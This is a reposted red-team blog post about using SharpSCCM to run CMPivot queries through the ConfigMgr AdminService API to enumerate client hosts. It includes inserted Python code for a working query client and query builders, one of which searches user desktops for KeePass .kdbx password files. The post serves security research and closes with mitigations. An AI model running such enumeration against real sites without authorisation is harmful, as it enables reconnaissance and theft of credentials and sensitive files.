Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)

Introduction

Earlier this year, I submitted a pull request to SharpSCCM’s repository. SharpSCCM is a tool that Chris Thompson developed to demonstrate possible attacks against Microsoft Configuration Manager (ConfigMgr, formerly Microsoft System Center Configuration Manager [SCCM]) deployments.

The PR extends SharpSCCM by adding the option to execute CMPivot queries through the Administration Service (AdminService) REST API. When operating within an SCCM/ConfigMgr site, and under the right context, this capability lets an offensive operator enumerate almost every aspect of a client’s software and hardware (starting with Configuration Manager 1810).

TL;DR — You Can Now Leverage CMPivot with SharpSCCM

SharpSCCM now lets you execute CMPivot queries against clients of a ConfigMgr site. Practical use examples are in the Practical Use Cases section below.

Credits

I did not entirely come up with this idea myself. Instead, I was lucky enough to be part of a conversation where the potential of leveraging ConfigMgr’s CMPivot queries and AdminService for offensive tradecraft was discussed. Chris Thompson (@_Mayyhem), Duane Michael (@subat0mik), Andy Robbins (@_wald0), Stephen Hinck (@StephenHinck), all of whom are much more experienced and well-versed than me in the subject at hand and offensive security overall, really brought to light the potential of leveraging these services as an offensive operator. Beyond that, Chris and Duane really pushed and helped me towards the goal of making this happen. Thanks for all the support!

Objective

The objective of this blog post is to show how a malicious actor can leverage the AdminService API to execute CMPivot queries on ConfigMgr clients, which can now be done with SharpSCCM. The post also gives a brief look at the background and inner workings of this new functionality, so that it can be used as effectively and safely as possible.

Impact

When operating with the required permissions, a user can leverage the AdminService to run operations against any client device within the ConfigMgr site. These operations allow for enumeration of:

· active sessions

· registry keys and values

· local administrators

· arbitrary file contents

And so much more!

There are more than 130 entities (queryable objects) available with CMPivot. These entities can be combined and filtered to create more targeted queries as well.

Each of the operations listed above has a worked example in the Practical Use Cases section.

Permissions

The following permissions are needed for CMPivot:

· Run CMPivot permission on the Collection scope

· Read permission on Collections

· Read permission on the SMS Scripts object (not needed after version 2107)

· The default scope (not needed after version 2107)

Background

A lot of this terminology may sound unfamiliar if you have not looked into the subject before. This first section is a very general and quick introduction to the main concepts we’ll be discussing in this article.

If you are completely new to Microsoft Configuration Manager (ConfigMgr), there are many online resources to learn from. Although it is not the main purpose of this article, a good gateway to the subject for me was Chris Thompson’s post “Coercing NTLM Authentication From SCCM”. It has a quick summary of most things you should know in order to approach the subject from an offensive security perspective.

CMPivot

CMPivot has been part of ConfigMgr since version 1806. It is an in-console or standalone tool that allows real-time collection of data from hosts that are clients of a ConfigMgr/SCCM site. Data is collected through a set of entities that can be queried. These queries let the user pull Windows event logs, registry values, file contents, operating system (OS) information, hardware information, local group membership, and more from any ConfigMgr client host.

Figure 1 — CMPivot Console

Also very useful is the option to apply filters to such queries to make them more efficient and better target the data we want. For example, we can filter a query that enumerates the OS of a target so that it only returns hosts running a 64-bit OS architecture. We can also scope these queries: run them against a single resource, or target an entire collection of hosts instead.

Figure 2 — Basic CMPivot Query

On the left-hand side of the CMPivot console, we can see a small portion of the many entities, and the queries within them, that we can execute to obtain information from clients. CMPivot queries use a subset of the Kusto Query Language (KQL).

Administration Service REST API

Way back with the technical preview of Configuration Manager 1612, Microsoft introduced something called the CMRestProvider. This was a newly implemented OData (Open Data Protocol) endpoint that exposed data available in the Configuration Manager WMI Provider (SMS Provider) via a REST API.

As is Microsoft’s fashion, the name has changed at least once since then and gave way to what is now known as the AdminService REST API. As part of its regular functioning, ConfigMgr uses this API in the background to perform different queries. For example, ConfigMgr can be configured so an administrator can approve or deny application installation requests from clients by clicking a link in an email, eliminating the need to do this from the ConfigMgr console.

This REST API is available to any domain account that holds the right permissions; a user with the required privileges can query it by sending GET and POST requests to the endpoint, authenticating with that domain account. These requests can be made from a web browser, PowerShell, or any other tool that can send HTTP requests.

Figure 3 — AdminService Request

Several methods are available in the AdminService, but the ones we care about for this blog post are those that let us execute CMPivot queries. For this, we can use the AdminService.RunCMPivot method.

When sending our requests, the query must be sent as JSON in the body of the request, and we have the option of pointing it at a collection of resources (hosts, users) or at a single target. The following is a short excerpt of how SharpSCCM makes these requests.

Figure 4 — SharpSCCM AdminService Requests

Basic Usage

Enter the invoke admin-service Command

Now that we have covered the basics, we can dig a little deeper into the implementation of this capability in SharpSCCM. The new feature adds the admin-service option to SharpSCCM’s invoke command, and with it the possibility to execute any CMPivot query that we specify with the “-q” flag. A basic example is a query that enumerates the processes running on a particular host/target:

Figure 5 — SharpSCCM Process Enumeration Query

Note: in the example, the target is identified by its resource-id. A later section shows how SharpSCCM can get us that information.

Figure 6 — SharpSCCM Process Enumeration Results

Depending on the data we are trying to gather, we can also apply filters to make the query more efficient. In this case, we list only processes named msedge.exe:

Figure 7 — Query Filters

Results Collection Process

Before looking into the other options available with the admin-service command, let’s take a look at how the results of these queries are returned to us in the background.

After receiving an OperationId from a successful call to the AdminService.RunCMPivot method, we use that value to call the AdminService.CMPivotResult method and obtain the results of our initial query. Figure 8 illustrates this, enumerating all processes running on a target the same way we did with SharpSCCM in the previous sections.

Figure 8 — AdminService Results Method Call

Of note here is that two different method calls are needed to complete a query.

Figure 9 — CMPivot Query Process

If we were performing these actions from the CMPivot user interface, we would see the results of the query displayed in the console; however, since we are making our requests through the AdminService, we must make a separate request for the results.

When doing this programmatically, keep in mind that there needs to be a delay between the initial query and the collection of results. This gives the PowerShell script that CMPivot uses to gather the queried data enough time to complete on the target.

Luckily, these delays are not too significant, since the query is sent from CMPivot to the client via SCCM’s fast channel and, after the script completes on the client, the results are sent back via the quick state message system. However, we still need to account for the wait.

Delay and Max Retries

To handle this, SharpSCCM periodically checks for results after an operation has been triggered; by default it checks every five seconds, a maximum of five times. A user can tweak these values with the “delay” and “max tries” flags respectively. For example, if we want the tool to check every 10 seconds, a maximum of three times, we could do the following:

Figure 10 — Delay and Retries
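The two-call flow described above (RunCMPivot, then CMPivotResult after a delay, with a bounded number of retries) as a small Python client. This is an added example written for this article, not SharpSCCM’s code. Everything about the endpoint is an assumption to verify against your own site: the provider name sccm.corp.local, the /AdminService/v1.0/ path, the Device(...) and Collections('...') bindings of the two methods, the OData $filter on the Device entity used to resolve a resource-id, the InputQuery body key, and the shape of the result document. The HTTP transport is injected, and the block ships with a constructed fake that answers 404 until the third result check, so it runs offline; against a real provider you would plug in a function that sends the request with Windows authentication and returns (status, decoded JSON).

```python
"""Minimal AdminService CMPivot client: RunCMPivot, then poll CMPivotResult.

Added example for this article, not SharpSCCM code. URL layout, body key and
result shape are assumptions; confirm them against your own SMS Provider.
"""
import json
import time
from typing import Callable, List, Optional, Tuple
from urllib.parse import quote

# transport(method, url, json_body_or_None) -> (http_status, decoded_json_or_None)
Transport = Callable[[str, str, Optional[str]], Tuple[int, Optional[dict]]]


def odata_literal(value: str) -> str:
    """Quote a string for OData: single quotes inside are doubled."""
    return "'" + value.replace("'", "''") + "'"


class CMPivotClient:
    """Two-call CMPivot flow over the AdminService (assumed endpoint layout)."""

    def __init__(self, provider: str, transport: Transport,
                 delay: float = 5.0, max_tries: int = 5, sleep=time.sleep):
        self.base = f"https://{provider}/AdminService/v1.0"  # assumed path
        self.transport = transport
        self.delay = delay          # seconds between result checks (article default: 5)
        self.max_tries = max_tries  # number of result checks (article default: 5)
        self.sleep = sleep          # injectable so tests do not actually wait

    def resource_id(self, hostname: str) -> int:
        """Resolve a device name to its ResourceId with an OData $filter (assumed)."""
        filt = quote(f"Name eq {odata_literal(hostname)}", safe="'=")
        status, doc = self.transport("GET", f"{self.base}/Device?$filter={filt}", None)
        rows = (doc or {}).get("value") or []
        if status != 200 or not rows:
            raise LookupError(f"no device named {hostname!r} (HTTP {status})")
        return int(rows[0]["ResourceId"])

    @staticmethod
    def _target(resource_id: Optional[int], collection_id: Optional[str]) -> str:
        """Exactly one of a single device or a whole collection, never both."""
        if (resource_id is None) == (collection_id is None):
            raise ValueError("give exactly one of resource_id or collection_id")
        if resource_id is not None:
            return f"Device({int(resource_id)})"
        return f"Collections({odata_literal(collection_id)})"

    def run(self, query: str, resource_id=None, collection_id=None) -> int:
        """First call: submit the query; the OperationId is the handle for results."""
        url = f"{self.base}/{self._target(resource_id, collection_id)}/AdminService.RunCMPivot"
        status, doc = self.transport("POST", url, json.dumps({"InputQuery": query}))
        if status != 200 or not doc:
            raise RuntimeError(f"RunCMPivot failed (HTTP {status})")
        return int(doc["value"]["OperationId"])

    def results(self, operation_id: int, resource_id=None, collection_id=None) -> List[dict]:
        """Second call: poll CMPivotResult until the client has reported back."""
        target = self._target(resource_id, collection_id)
        url = f"{self.base}/{target}/AdminService.CMPivotResult(OperationId={int(operation_id)})"
        for _ in range(self.max_tries):
            self.sleep(self.delay)  # the CMPivot script must finish on the client first
            status, doc = self.transport("GET", url, None)
            if status == 200 and doc:
                return list(doc["value"]["Result"])  # assumed result shape
            # anything else: the state message has not arrived yet, try again
        raise TimeoutError(f"no result after {self.max_tries} checks of {self.delay}s")

    def query(self, query: str, **target) -> List[dict]:
        return self.results(self.run(query, **target), **target)


def make_fake_transport(ready_after: int) -> Transport:
    """Constructed stand-in for the AdminService; results are 404 until the Nth check."""
    state = {"result_gets": 0}

    def transport(method: str, url: str, body: Optional[str]):
        if method == "GET" and "Device?$filter=Name%20eq%20'WS01'" in url:
            return 200, {"value": [{"ResourceId": 16777220, "Name": "WS01"}]}
        if method == "POST" and url.endswith("Device(16777220)/AdminService.RunCMPivot"):
            assert json.loads(body)["InputQuery"].startswith("Process")
            return 200, {"value": {"OperationId": 16778405}}
        if method == "GET" and "AdminService.CMPivotResult(OperationId=16778405)" in url:
            state["result_gets"] += 1
            if state["result_gets"] < ready_after:
                return 404, None
            return 200, {"value": {"Result": [  # constructed rows
                {"Device": "WS01", "Name": "msedge.exe", "ProcessId": 4120},
                {"Device": "WS01", "Name": "msedge.exe", "ProcessId": 5568},
            ]}}
        return 404, None

    return transport


def demo(ready_after: int = 3) -> List[dict]:
    """Resolve WS01, run the msedge.exe filter from Figure 7, poll 3 times, 10 s apart."""
    client = CMPivotClient("sccm.corp.local", make_fake_transport(ready_after),
                           delay=10, max_tries=3, sleep=lambda s: None)
    rid = client.resource_id("WS01")
    return client.query("Process | where Name == 'msedge.exe'", resource_id=rid)


if __name__ == "__main__":
    for row in demo():
        print(row)
```

With the fake set to become ready only on a fourth check, the same call raises TimeoutError, which is the behaviour you want from a tool rather than silently returning an empty result set; when that happens on a real site, raise the delay or the number of tries, or check that the target is actually online.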

Single Resource vs Collection

We can also take advantage of CMPivot’s ability to query either a single resource or a group of resources, known as a collection in SCCM lingo. If we point our queries at a single target, we need the resource-id associated with that host within the ConfigMgr/SCCM site. We can obtain this with SharpSCCM by using the resource-id option of the “get” command, with the “-d” flag indicating the hostname we are trying to resolve. For example:

Figure 11 — Resource-id Resolution

If we want to point the query at a collection, we only need its name, or we can choose a default collection (if available).

Figure 12 — All Systems Query

JSON Output

We can also have the data returned as JSON by adding the “-j” flag to our commands.

Figure 13 — JSON Output Query

Practical Use Cases

The following are some practical examples with SharpSCCM.

Active Sessions

We can attempt to enumerate active sessions on a client by leveraging CMPivot to collect records from the target’s Windows Event Log. Events with security Event ID 4624 (An account was successfully logged on) give a good idea of the current or recent sessions on the target. Keep in mind that a 4624 event records a logon, not a session that is necessarily still active, so treat the results as a lead rather than proof of presence. A query to get started would look like this:

Figure 14 — Event ID 4624 Filtered Query

Registry Keys and Values

Let’s say we want to enumerate a particular registry key. For example, to check which systems in the site still have the PowerShell version 2 engine available, we would target the default “All Systems” (SMS00001) collection in the following query:

Figure 15 — PowerShell Version Enumeration

Local Administrators

We can query for the local administrators of a certain target too:

Figure 16 — Local Administrators Enumeration

Or we can query for a specific admin account on all clients:

Figure 17 — Targeted Local Administrator Enumeration

Arbitrary File Contents

We can also read the contents of a sensitive file within a target. For example:

Figure 18 — File Content Read

Or we can look for a particular file on all clients in the site. Note that it is important to factor in the size and bandwidth of the site before executing a broadly scoped query like this.

Figure 19 — File Search
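How the queries behind the four use cases above are written, and how they survive the two layers of escaping between a Windows path and the AdminService request body. This is an added example for this article, not SharpSCCM code. CMPivot string literals follow Kusto rules, so a backslash inside a path is written as two; the finished query is then serialised once more as JSON for the request body (assumed key InputQuery, the same one SharpSCCM sends), so a path ends up with four backslashes on the wire. The entity names (EventLog, Registry, Administrators, FileContent, File) and the Registry Property column are used as the author understands the CMPivot documentation and should be confirmed in your own site’s console; the paths, time window and account name are constructed.

```python
"""CMPivot query builders for the use cases above (added example, not SharpSCCM code)."""
import json
from typing import Dict, Optional


def kql_str(value: str) -> str:
    """Single-quoted Kusto string literal: backslash and single quote are escaped."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def active_sessions(days: int = 1) -> str:
    """Security 4624 (successful logon) events from the last N days.
    The EventLog('Security', 1d) time-window form is assumed from the CMPivot docs."""
    return f"EventLog('Security', {int(days)}d) | where EventID == 4624"


def registry_values(key_path: str, value_name: Optional[str] = None) -> str:
    """Values under a key; optionally keep only one value name (Property column, assumed)."""
    q = f"Registry({kql_str(key_path)})"
    if value_name is not None:
        q += f" | where Property == {kql_str(value_name)}"
    return q


def local_admins(account: Optional[str] = None) -> str:
    """All local administrators, or only a specific DOMAIN\\account."""
    q = "Administrators"
    if account is not None:
        q += f" | where Name == {kql_str(account)}"
    return q


def file_contents(path: str) -> str:
    """Read a file from the client; path is a literal, so escape it."""
    return f"FileContent({kql_str(path)})"


def file_search(pattern: str) -> str:
    """Look for files matching a wildcard pattern (confirm directory-level wildcards on your version)."""
    return f"File({kql_str(pattern)})"


def request_body(query: str) -> str:
    """The JSON body for RunCMPivot; json.dumps adds the second escaping layer."""
    return json.dumps({"InputQuery": query})


def decoded_query(body: str) -> str:
    """What the provider sees after JSON decoding: the Kusto-escaped query, unchanged."""
    return json.loads(body)["InputQuery"]


def use_case_queries() -> Dict[str, str]:
    """Constructed queries for the four sections above."""
    return {
        "active_sessions": active_sessions(1),
        # PowerShell v2 engine lives under the \1\ key, not \3\
        "powershell_v2": registry_values(
            r"HKLM:\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine", "PowerShellVersion"),
        "local_admins": local_admins(r"CORP\svc_backup"),
        "file_contents": file_contents(r"C:\Windows\System32\drivers\etc\hosts"),
        "file_search": file_search(r"C:\Users\*\Desktop\*.kdbx"),
    }


if __name__ == "__main__":
    for name, q in use_case_queries().items():
        print(f"{name:16} {q}")
        print(f"{'':16} body: {request_body(q)}")
```

Passing the query to SharpSCCM’s “-q” flag needs the Kusto layer only (the tool builds the JSON); when you hand-craft the REST call, forgetting the second layer is the usual reason a query with a path works in the console but fails over the AdminService.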

Conclusion

My hope is that this added functionality helps draw attention to the vast power that comes with Full Administrator or equivalent permissions within a ConfigMgr/SCCM site, and to how CMPivot allows very detailed data gathering and enumeration of client hosts.

Mitigation

Starting in Configuration Manager 1702, you have the option of enabling multi-factor authentication (MFA) for SMS Provider calls. This can help prevent unauthorized administrative access requests to it. Independently of MFA, the permissions listed earlier are the gate: audit which security roles carry Run CMPivot and Read on Collections, and keep their collection scopes as narrow as the role actually needs.

For some information on how to enable this, see

SharpSCCM’s wiki also includes a list of defensive recommendations for ConfigMgr/SCCM:


Originally published by Diego Lomellini: Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)

Copyright notice: posted by admin on 8 November 2023 at 10:43 AM.
When reposting, please credit: Lateral Movement without Lateral Movement (Brought to you by ConfigMgr) | CTF导航